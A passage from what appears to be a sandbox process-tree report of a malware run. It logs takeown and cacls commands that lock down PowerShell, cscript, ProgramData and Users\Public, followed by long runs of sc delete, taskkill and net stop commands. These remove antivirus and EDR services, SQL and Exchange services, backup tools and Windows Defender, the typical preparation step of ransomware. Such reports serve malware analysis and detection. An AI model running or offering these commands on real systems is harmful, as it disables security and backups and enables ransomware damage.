- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d system
    3⤵
    PID:5924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:7096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:6552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:7124
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6864
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:7276
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:7384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:6576
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:7064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\ProgramData /a
    3⤵
    - Modifies file permissions
    PID:4784
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /g Administrators:f
    3⤵
    PID:920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:7684
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /g Users:r
    3⤵
    PID:908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /g Administrators:r
    3⤵
    PID:5952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d SERVICE
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d mssqlserver
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d "network service"
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d system
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:6176
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d mssql$sqlexpress
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Users\Public /a
    3⤵
    - Modifies file permissions
    PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:8160
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /g Administrators:f
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /g Users:r
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /g Administrators:r
    3⤵
    PID:8180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:6216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d SERVICE
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d mssqlserver
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:508
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d "network service"
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d system
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:8128
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d mssql$sqlexpress
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmickvpexchange"
    3⤵
    - Launches sc.exe
    PID:8112
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicguestinterface"
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicshutdown"
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicheartbeat"
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicrdv"
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\sc.exe
    sc delete "storflt"
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmictimesync"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicvss"
    3⤵
    PID:6460
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hvdsvc"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\sc.exe
    sc delete "nvspwmi"
    3⤵
    - Launches sc.exe
    PID:2256
- - C:\Windows\SysWOW64\sc.exe
    sc delete "wmms"
    3⤵
    PID:5196
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AvgAdminServer"
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVG Antivirus"
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\sc.exe
    sc delete "avgAdminClient"
    3⤵
    - Launches sc.exe
    PID:6480
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVService"
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVAdminService"
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos AutoUpdate Service"
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Clean Service"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Device Control Service"
    3⤵
    - Launches sc.exe
    PID:700
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos File Scanner Service"
    3⤵
    PID:7760
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Health Service"
    3⤵
    PID:6040
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Agent"
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Client"
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SntpService"
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swc_service"
    3⤵
    - Launches sc.exe
    PID:5780
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_service"
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos UI"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_update"
    3⤵
    PID:5616
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Web Control Service"
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos System Protection Service"
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Safestore Service"
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hmpalertsvc"
    3⤵
    - Launches sc.exe
    PID:432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RpcEptMapper"
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SophosFIM"
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_filter"
    3⤵
    - Launches sc.exe
    PID:2640
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdGuardianDefaultInstance"
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdServerDefaultInstance"
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher"
    3⤵
    - Launches sc.exe
    PID:1192
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLSERVER"
    3⤵
    PID:764
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLSERVERAGENT"
    3⤵
    PID:6188
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLBrowser"
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer130"
    3⤵
    - Launches sc.exe
    PID:5208
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SSISTELEMETRY130"
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLWriter"
    3⤵
    PID:7884
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$VEEAMSQL2012"
    3⤵
    - Launches sc.exe
    PID:5332
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL"
    3⤵
    PID:6240
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerADHelper100"
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerOLAPService"
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer100"
    3⤵
    PID:396
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY$HL"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMBMServer"
    3⤵
    - Launches sc.exe
    PID:1720
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$PROGID"
    3⤵
    PID:7940
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$WOLTERSKLUWER"
    3⤵
    PID:5920
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$PROGID"
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$WOLTERSKLUWER"
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher$OPTIMA"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$OPTIMA"
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:3764
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer$OPTIMA"
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\sc.exe
    sc delete "msftesql$SQLEXPRESS"
    3⤵
    PID:6168
- - C:\Windows\SysWOW64\sc.exe
    sc delete "postgresql-x64-9.4"
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\sc.exe
    sc delete "WRSVC"
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrn"
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrnEpsw"
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klim6"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVP18.0.0"
    3⤵
    - Launches sc.exe
    PID:7008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KLIF"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klpd"
    3⤵
    PID:5860
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klflt"
    3⤵
    - Launches sc.exe
    PID:6272
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupdisk"
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupflt"
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klkbdflt"
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klmouflt"
    3⤵
    PID:6180
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klhk"
    3⤵
    PID:6848
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KSDE1.0.0"
    3⤵
    PID:6236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Realtek11nSU
      4⤵
      PID:5316
- - C:\Windows\SysWOW64\sc.exe
    sc delete "kltap"
    3⤵
    PID:276
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TeamViewer8
      4⤵
      PID:6540
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ScSecSvc"
    3⤵
    PID:7428
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Mail Protection"
    3⤵
    PID:7392
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning Server"
    3⤵
    PID:7384
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning ServerEx"
    3⤵
    PID:5264
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Online Protection System"
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RepairService"
    3⤵
    - Launches sc.exe
    PID:5344
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Browsing Protection"
    3⤵
    PID:6280
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Quick Update Service"
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\sc.exe
    sc delete "McAfeeFramework"
    3⤵
    PID:6540
- - C:\Windows\SysWOW64\sc.exe
    sc delete "macmnsvc"
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\sc.exe
    sc delete "masvc"
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfemms"
    3⤵
    PID:6084
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfevtp"
    3⤵
    PID:6756
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmFilter"
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMLWCSService"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmusa"
    3⤵
    - Launches sc.exe
    PID:5704
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPreFilter"
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMSmartRelayService"
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMiCRCScanService"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\sc.exe
    sc delete "VSApiNt"
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmCCSF"
    3⤵
    PID:5948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmlisten"
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmProxy"
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ntrtscan"
    3⤵
    PID:6868
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ofcservice"
    3⤵
    - Launches sc.exe
    PID:3132
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPfw"
    3⤵
    - Launches sc.exe
    PID:6888
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PccNTUpd"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PandaAetherAgent"
    3⤵
    PID:7864
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PSUAService"
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\sc.exe
    sc delete "NanoServiceMain"
    3⤵
    PID:924
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPIntegrationService"
    3⤵
    PID:5580
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPProtectedService"
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPRedline"
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPSecurityService"
    3⤵
    PID:5976
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPUpdateService"
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "UniFi"
    3⤵
    PID:7964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im PccNTMon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im NTRtScan.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmListen.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmCCSF.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmProxy.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7292
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4160
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmPfw.exe
    3⤵
    PID:6660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop XenSvc
      4⤵
      PID:7880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im CNTAoSMgr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlbrowser.exe
    3⤵
    PID:7868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlwriter.exe
    3⤵
    PID:6788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msmdsrv.exe
    3⤵
    PID:6316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im MsDtsSrvr.exe
    3⤵
    PID:6576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlceip.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6260
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im Ssms.exe
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdhost.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    PID:8092
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msftesql.exe
    3⤵
    PID:7108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im pg_ctl.exe
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im postgres.exe
    3⤵
    PID:6472
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:2900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:5464
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ISARS
    3⤵
    PID:6916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ISARS
      4⤵
      PID:6940
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$MSFW
    3⤵
    PID:6900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$MSFW
      4⤵
      PID:7048
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ISARS
    3⤵
    PID:7636
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ISARS
      4⤵
      PID:6432
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$MSFW
    3⤵
    PID:6400
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$MSFW
      4⤵
      PID:6844
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:7064
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:7272
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$ISARS
    3⤵
    PID:6044
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$ISARS
      4⤵
      PID:6988
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:6256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:7244
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:7944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:6004
- - C:\Windows\SysWOW64\net.exe
    net stop mr2kserv
    3⤵
    PID:6296
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mr2kserv
      4⤵
      PID:6656
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeADTopology
    3⤵
    PID:524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeADTopology
      4⤵
      PID:7224
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeFBA
    3⤵
    PID:6500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeFBA
      4⤵
      PID:7072
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS
    3⤵
    PID:7060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS
      4⤵
      PID:1496
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA
    3⤵
    PID:6608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA
      4⤵
      PID:6896
- - C:\Windows\SysWOW64\net.exe
    net stop ShadowProtectSvc
    3⤵
    PID:1544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShadowProtectSvc
      4⤵
      PID:6812
- - C:\Windows\SysWOW64\net.exe
    net stop SPAdminV4
    3⤵
    PID:6740
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPAdminV4
      4⤵
      PID:7632
- - C:\Windows\SysWOW64\net.exe
    net stop SPTimerV4
    3⤵
    PID:2328
  - - C:\Windows\SysWOW64\net1.exe
